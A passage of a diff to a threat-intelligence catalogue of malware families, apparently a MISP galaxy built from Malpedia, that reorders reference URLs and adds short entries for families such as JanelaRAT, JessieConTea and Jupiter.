"https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/", + "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", + "https://www.tgsoft.it/files/report/download.asp?id=568531345", + "https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", + "https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle", + "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization", + "https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html", + "https://redcanary.com/resources/webinars/deep-dive-process-injection/", + "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html", + "https://0ffset.net/reverse-engineering/malware-analysis/analysing-isfb-loader/", + "https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html", + "https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245", + "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", + "https://www.fidelissecurity.com/threatgeek/threat-intelligence/gozi-v3-technical-update/", + "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", + "http://benkow.cc/DreambotSAS19.pdf", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", - "https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/", - "https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-ursnif-infections/", - "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://0ffset.net/reverse-engineering/analyzing-com-mechanisms-in-malware/", + "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/gozi-italian-shellcode-dance", + "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", + "https://isc.sans.edu/forums/diary/German+language+malspam+pushes+Ursnif/25732/", "https://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/", - "https://blog.qualys.com/vulnerabilities-threat-research/2022/05/08/ursnif-malware-banks-on-news-events-for-phishing-attacks", - "https://therecord.media/gozi-malware-gang-member-arrested-in-colombia/", - "http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html", - "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization", - "https://research.nccgroup.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf", - "https://securityintelligence.com/posts/ursnif-cerberus-android-malware-bank-transfers-italy/", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", - "https://threatresearch.ext.hp.com/detecting-ta551-domains/", - "https://www.hornetsecurity.com/en/security-information/firefox-send-sends-ursnif-malware/", - "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf", - "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb", + "https://blog.yoroi.company/research/ursnif-long-live-the-steganography/", + "https://www.bridewell.com/insights/news/detail/hunting-for-ursnif", + "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html", + "https://www.darktrace.com/en/blog/the-resurgence-of-the-ursnif-banking-trojan/", + "https://www.proofpoint.com/us/blog/threat-insight/out-sandbox-wikiloader-digs-sophisticated-evasion", + "https://www.proofpoint.com/us/threat-insight/post/urlzone-top-malware-japan-while-emotet-and-line-phishing-round-out-landscape-0", + "https://www.zdnet.com/article/ursnif-trojan-has-targeted-over-100-italian-banks/", + "https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif", + "https://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072", "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/", - "https://www.cyberbit.com/new-ursnif-malware-variant/", - "https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/", - "https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/", "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex", - "https://www.proofpoint.com/us/blog/security-briefs/ta544-targets-italian-organizations-ursnif-malware" + "https://blog.group-ib.com/gozi-latest-ttps", + "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html", + "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15", + "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/", + "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf", + "https://www.cyberbit.com/blog/endpoint-security/new-ursnif-malware-variant/" ], "synonyms": [ "Gozi ISFB", @@ -29270,11 +30669,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent", - "https://unit42.paloaltonetworks.com/atoms/evasive-serpens/", "http://www.clearskysec.com/ismagent/", "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia", - "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae" + "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae", + "https://unit42.paloaltonetworks.com/atoms/evasive-serpens/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia" ], "synonyms": [], "type": [] @@ -29287,11 +30686,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismdoor", - "http://www.clearskysec.com/greenbug/", - "https://unit42.paloaltonetworks.com/atoms/evasive-serpens/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia", + "https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", - "https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon" + "https://unit42.paloaltonetworks.com/atoms/evasive-serpens/", + "http://www.clearskysec.com/greenbug/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia" ], "synonyms": [], "type": [] @@ -29318,8 +30717,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.israbye", - "https://twitter.com/malwrhunterteam/status/1085162243795369984", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/" + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", + "https://twitter.com/malwrhunterteam/status/1085162243795369984" ], "synonyms": [], "type": [] @@ -29345,13 +30744,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace", - "https://wikileaks.org/vault7/document/2015-09-20150911-280-CSIT-15085-NfLog/2015-09-20150911-280-CSIT-15085-NfLog.pdf", - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/", - "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/", - "https://www.secureworks.com/research/threat-profiles/bronze-express", "https://www.secureworks.com/research/threat-profiles/bronze-overbrook", + "https://wikileaks.org/vault7/document/2015-09-20150911-280-CSIT-15085-NfLog/2015-09-20150911-280-CSIT-15085-NfLog.pdf", + "https://unit42.paloaltonetworks.com/watering-hole-attack-on-aerospace-firm-exploits-cve-2015-5122-to-install-isspace-backdoor/", + "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/", "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf", - "https://unit42.paloaltonetworks.com/watering-hole-attack-on-aerospace-firm-exploits-cve-2015-5122-to-install-isspace-backdoor/" + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/", + "https://www.secureworks.com/research/threat-profiles/bronze-express" ], "synonyms": [ "NfLog RAT" @@ -29374,6 +30773,19 @@ "uuid": "5710dffa-ec02-4e5c-848e-47af13f729d7", "value": "IXWare" }, + { + "description": "According to Kaspersky Labs, this malware tool set has been used by APT group GoldenJackal, which has been observed since 2019 and which usually targets government and diplomatic entities in the Middle East and South Asia with espionage. It consists of multiple components and is written in .NET.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jackal", + "https://securelist.com/goldenjackal-apt-group/109677/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5f601f0a-13f7-40b5-9cf1-2eb50d5bad64", + "value": "Jackal" + }, { "description": "", "meta": { @@ -29391,12 +30803,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaff", - "https://clairelevin.github.io/malware/2023/02/14/jaff.html", - "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", - "https://intel471.com/blog/a-brief-history-of-ta505", "http://malware-traffic-analysis.net/2017/05/16/index.html", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", - "https://www.proofpoint.com/us/threat-insight/post/jaff-new-ransomware-from-actors-behind-distribution-of-dridex-locky-bart" + "https://intel471.com/blog/a-brief-history-of-ta505", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://www.proofpoint.com/us/threat-insight/post/jaff-new-ransomware-from-actors-behind-distribution-of-dridex-locky-bart", + "https://clairelevin.github.io/malware/2023/02/14/jaff.html", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf" ], "synonyms": [], "type": [] @@ -29421,10 +30833,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku", - "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146", "https://securelist.com/whos-really-spreading-through-the-bright-star/68978/", + "https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf", "https://www.brighttalk.com/webcast/7451/538775", - "https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf" + "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146" ], "synonyms": [ "C3PRO-RACOON", @@ -29437,6 +30849,19 @@ "uuid": "0f02ea79-5833-46e0-8458-c4a863a5a112", "value": "Jaku" }, + { + "description": "According to Zscaler, JanelaRAT is a heavily modified variant of BX RAT. Its focus is set on harvesting LATAM financial data and its method of extracting window titles for transmission underscores its targeted and stealthy nature. With an adaptive approach utilizing dynamic socket configuration and exploiting DLL side-loading from trusted sources, JanelaRAT poses a significant threat. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.janela_rat", + "https://www.zscaler.com/blogs/security-research/janelarat-repurposed-bx-rat-variant-targeting-latam-fintech" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d8455b0c-1d0b-4857-8e6a-abc6892cf7b9", + "value": "JanelaRAT" + }, { "description": "", "meta": { @@ -29452,14 +30877,14 @@ "value": "Janeleiro" }, { - "description": "Jason is a graphic tool implemented to perform Microsoft exchange account brute-force in order to “harvest” the highest possible emails and accounts information. Distributed in a ZIP container the interface is quite intuitive: the Microsoft exchange address and its version shall be provided. Three brute-force methods could be selected: EWS (Exchange Web Service), OAB (Offline Address Book) or both (All). Username and password list can be selected and threads number should be provided in order to optimize the attack balance.", + "description": "Jason is a graphic tool implemented to perform Microsoft exchange account brute-force in order to \u201charvest\u201d the highest possible emails and accounts information. Distributed in a ZIP container the interface is quite intuitive: the Microsoft exchange address and its version shall be provided. Three brute-force methods could be selected: EWS (Exchange Web Service), OAB (Offline Address Book) or both (All). Username and password list can be selected and threads number should be provided in order to optimize the attack balance.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jason", - "https://twitter.com/P3pperP0tts/status/1135503765287657472", - "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://marcoramilli.com/2019/06/06/apt34-jason-project/", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf" + "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", + "https://twitter.com/P3pperP0tts/status/1135503765287657472" ], "synonyms": [], "type": [] @@ -29510,15 +30935,30 @@ "uuid": "a1d7e117-4ca9-4d67-a4dd-53626827ed2f", "value": "Jeno" }, + { + "description": "JessieConTea is a remote access trojan that uses HTTP(S) for communication. It supports around 30 commands that include operations on the victim\u2019s filesystem, basic process management, file exfiltration (both plain and zipped), and the download and execution of additional tools from the attacker\u2019s arsenal. The commands are indexed by 32-bit integers, starting with the value 0x60D49D97.\r\n\r\nThe malware was delivered in-the-wild via trojanized applications like DeFi Wallet or Citrix Workspace.\r\n\r\nJessieConTea generates POST parameters with a specific parameter name, jsessid, from which the initial part of its name is derived. Also, it contains a specific RTTI symbol \".?AVCHttpConn@@\", which inspired the second part of the name. It uses RC4 for C&C traffic encryption.\r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jessiecontea", + "https://cn.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf", + "https://blog.talosintelligence.com/2019/01/fake-korean-job-posting.html", + "https://securelist.com/lazarus-trojanized-defi-app/106195/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8f286f97-30c8-4281-887b-9cbede9f1e1e", + "value": "JessieConTea" + }, { "description": "Cisco Talos identified JhoneRAT in January 2020. The RAT is delivered through cloud services (Google Drive) and also submits stolen data to them (Google Drive, Twitter, ImgBB, GoogleForms). The actors using JhoneRAT target Saudi Arabia, Iraq, Egypt, Libya, Algeria, Morocco, Tunisia, Oman, Yemen, Syria, UAE, Kuwait, Bahrain and Lebanon.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jhone_rat", - "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf", - "https://blog.talosintelligence.com/2020/01/jhonerat.html", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", - "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/" + "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf", + "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/", + "https://blog.talosintelligence.com/2020/01/jhonerat.html" ], "synonyms": [], "type": [] @@ -29569,15 +31009,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.joanap", + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", + "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware", "https://app.box.com/s/xyyord0b806e6or2nh92coxw2areyyx4", + "https://www.secureworks.com/research/threat-profiles/nickel-academy", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A", - "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", - "https://www.secureworks.com/research/threat-profiles/nickel-academy", - "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware", "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/", - "https://www.us-cert.gov/ncas/alerts/TA18-149A", - "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.us-cert.gov/ncas/alerts/TA18-149A" ], "synonyms": [], "type": [] @@ -29656,14 +31096,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jsoutprox", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://twitter.com/zlab_team/status/1208022180241530882", - "https://blogs.quickheal.com/multi-staged-jsoutprox-rat-targets-indian-cooperative-banks-and-finance-companies/", - "https://www.fortinet.com/blog/threat-research/adversary-playbook-javascript-rat-looking-for-that-government-cheese", - "https://blog.yoroi.company/research/unveiling-jsoutprox-a-new-enterprise-grade-implant/", - "https://yoroi.company/research/financial-institutions-in-the-sight-of-new-jsoutprox-attack-waves/", "https://www.zscaler.com/blogs/research/targeted-attacks-indian-government-and-financial-institutions-using-jsoutprox-rat", - "https://www.seqrite.com/documents/en/white-papers/whitepaper-multi-staged-jsoutprox-rat-target-indian-co-operative-banks-and-finance-companies.pdf" + "https://www.seqrite.com/documents/en/white-papers/whitepaper-multi-staged-jsoutprox-rat-target-indian-co-operative-banks-and-finance-companies.pdf", + "https://www.fortinet.com/blog/threat-research/adversary-playbook-javascript-rat-looking-for-that-government-cheese", + "https://blogs.quickheal.com/multi-staged-jsoutprox-rat-targets-indian-cooperative-banks-and-finance-companies/", + "https://yoroi.company/research/financial-institutions-in-the-sight-of-new-jsoutprox-attack-waves/", + "https://blog.yoroi.company/research/unveiling-jsoutprox-a-new-enterprise-grade-implant/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" ], "synonyms": [], "type": [] @@ -29676,19 +31116,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jssloader", - "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/", - "https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/FIN7%20JSSLOADER%20FINAL%20WEB.pdf", - "https://malwarebytes.app.box.com/s/ym6r7o5hq0rx2nxjbctfv2sw5vx386ni", - "https://blog.morphisec.com/vmware-identity-manager-attack-backdoor", - "https://www.mandiant.com/resources/evolution-of-fin7", - "https://www.secureworks.com/blog/excel-add-ins-deliver-jssloader-malware", - "https://www.bleepingcomputer.com/news/security/malicious-microsoft-excel-add-ins-used-to-deliver-rat-malware/", - "https://www.malwarebytes.com/blog/threat-intelligence/2022/08/jssloader-the-shellcode-edition", "https://blog.morphisec.com/new-jssloader-trojan-delivered-through-xll-files", "https://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html", + "https://malwarebytes.app.box.com/s/ym6r7o5hq0rx2nxjbctfv2sw5vx386ni", + "https://www.secureworks.com/blog/excel-add-ins-deliver-jssloader-malware", + "https://www.microsoft.com/en-us/security/blog/2023/09/12/malware-distributor-storm-0324-facilitates-ransomware-access/", "https://www.proofpoint.com/us/blog/threat-insight/jssloader-recoded-and-reloaded", + "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/", + "https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/FIN7%20JSSLOADER%20FINAL%20WEB.pdf", + "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/", + "https://www.malwarebytes.com/blog/threat-intelligence/2022/08/jssloader-the-shellcode-edition", + "https://www.bleepingcomputer.com/news/security/malicious-microsoft-excel-add-ins-used-to-deliver-rat-malware/", "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/" + "https://www.mandiant.com/resources/evolution-of-fin7", + "https://blog.morphisec.com/vmware-identity-manager-attack-backdoor" ], "synonyms": [], "type": [] @@ -29701,11 +31142,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.juicy_potato", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf", + "https://lifars.com/wp-content/uploads/2020/06/Cryptocurrency-Miners-XMRig-Based-CoinMiner-by-Blue-Mockingbird-Group.pdf", "https://www.sentinelone.com/blog/bluesky-ransomware-ad-lateral-movement-evasion-and-fast-encryption-puts-threat-on-the-radar/", "https://github.com/ohpe/juicy-potato", - "https://www.welivesecurity.com/2021/08/09/iispy-complex-server-side-backdoor-antiforensic-features/", - "https://lifars.com/wp-content/uploads/2020/06/Cryptocurrency-Miners-XMRig-Based-CoinMiner-by-Blue-Mockingbird-Group.pdf", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf" + "https://www.welivesecurity.com/2021/08/09/iispy-complex-server-side-backdoor-antiforensic-features/" ], "synonyms": [], "type": [] @@ -29726,6 +31167,22 @@ "uuid": "a08db33d-4c37-4075-bd49-c3ab66a339db", "value": "JUMPALL" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jupiter", + "https://securelist.com/lazarus-andariel-mistakes-and-easyrat/110119/", + "https://medium.com/@DCSO_CyTec/andariels-jupiter-malware-and-the-case-of-the-curious-c2-dbfe29f57499" + ], + "synonyms": [ + "EarlyRAT" + ], + "type": [] + }, + "uuid": "47baaed8-073c-4a13-92dc-434210ea3cd0", + "value": "Jupiter" + }, { "description": "", "meta": { @@ -29759,10 +31216,10 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.karagany", "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks", - "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group", "https://www.secureworks.com/research/threat-profiles/iron-liberty", - "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", - "https://vblocalhost.com/uploads/VB2021-Slowik.pdf" + "https://vblocalhost.com/uploads/VB2021-Slowik.pdf", + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group", + "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector" ], "synonyms": [ "Karagny" @@ -29777,8 +31234,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kardonloader", - "https://engineering.salesforce.com/kardon-loader-malware-analysis-adaaaab42bab", - "https://asert.arbornetworks.com/kardon-loader-looks-for-beta-testers/" + "https://asert.arbornetworks.com/kardon-loader-looks-for-beta-testers/", + "https://engineering.salesforce.com/kardon-loader-malware-analysis-adaaaab42bab" ], "synonyms": [], "type": [] @@ -29791,9 +31248,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.karius", - "https://research.checkpoint.com/banking-trojans-development/", "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest", - "https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/" + "https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/", + "https://research.checkpoint.com/banking-trojans-development/" ], "synonyms": [], "type": [] @@ -29807,10 +31264,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.karkoff", "https://www.secureworks.com/research/threat-profiles/cobalt-edgewater", - "https://blog.telsy.com/apt34-aka-oilrig-attacks-lebanon-government-entities-with-maildropper-implant/", "https://blog.yoroi.company/research/karkoff-2020-a-new-apt34-espionage-operation-involves-lebanon-government/", "https://mp.weixin.qq.com/s/o_EVjBVN2sQ1q7cl4rUXoQ", "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html", + "https://blog.telsy.com/apt34-aka-oilrig-attacks-lebanon-government-entities-with-maildropper-implant/", "https://www.trendmicro.com/en_us/research/23/b/new-apt34-malware-targets-the-middle-east.html", "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae" ], @@ -29829,14 +31286,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.karma", - "https://www.sentinelone.com/labs/karma-ransomware-an-emerging-threat-with-a-hint-of-nemty-pedigree/", - "https://news.sophos.com/en-us/2022/02/28/conti-and-karma-actors-attack-healthcare-provider-at-same-time-through-proxyshell-exploits/?cmp=30728", - "https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/", - "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", - "https://blogs.blackberry.com/en/2021/11/threat-thursday-karma-ransomware", - "https://www.youtube.com/watch?v=hgz5gZB3DxE", + "https://blog.cyble.com/2021/08/24/a-deep-dive-analysis-of-karma-ransomware/", "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", - "https://blog.cyble.com/2021/08/24/a-deep-dive-analysis-of-karma-ransomware/" + "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", + "https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/", + "https://www.youtube.com/watch?v=hgz5gZB3DxE", + "https://blogs.blackberry.com/en/2021/11/threat-thursday-karma-ransomware", + "https://news.sophos.com/en-us/2022/02/28/conti-and-karma-actors-attack-healthcare-provider-at-same-time-through-proxyshell-exploits/?cmp=30728", + "https://www.sentinelone.com/labs/karma-ransomware-an-emerging-threat-with-a-hint-of-nemty-pedigree/" ], "synonyms": [], "type": [] @@ -29849,8 +31306,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kasperagent", - "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", - "https://www.threatconnect.com/blog/kasperagent-malware-campaign/" + "https://www.threatconnect.com/blog/kasperagent-malware-campaign/", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/" ], "synonyms": [], "type": [] @@ -29864,14 +31321,16 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kazuar", "https://youtu.be/SW8kVkwDOrc?t=24706", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/", - "https://www.epicturla.com/blog/sysinturla", - "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", + "http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", "https://securelist.com/apt-trends-report-q1-2021/101967/", "https://securelist.com/sunburst-backdoor-kazuar/99981/", - "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/" + "https://cert.gov.ua/article/5213167", + "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/", + "https://twitter.com/msftsecintel/status/1681695399084539908", + "https://www.epicturla.com/blog/sysinturla" ], "synonyms": [], "type": [] @@ -29939,15 +31398,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos", - "https://en.wikipedia.org/wiki/Kelihos_botnet", - "https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/", - "https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/", - "https://www.crowdstrike.com/blog/farewell-to-kelihos-and-zombie-spider/", - "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/", "https://www.justice.gov/opa/pr/russian-national-convicted-charges-relating-kelihos-botnet", + "https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/", "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf", - 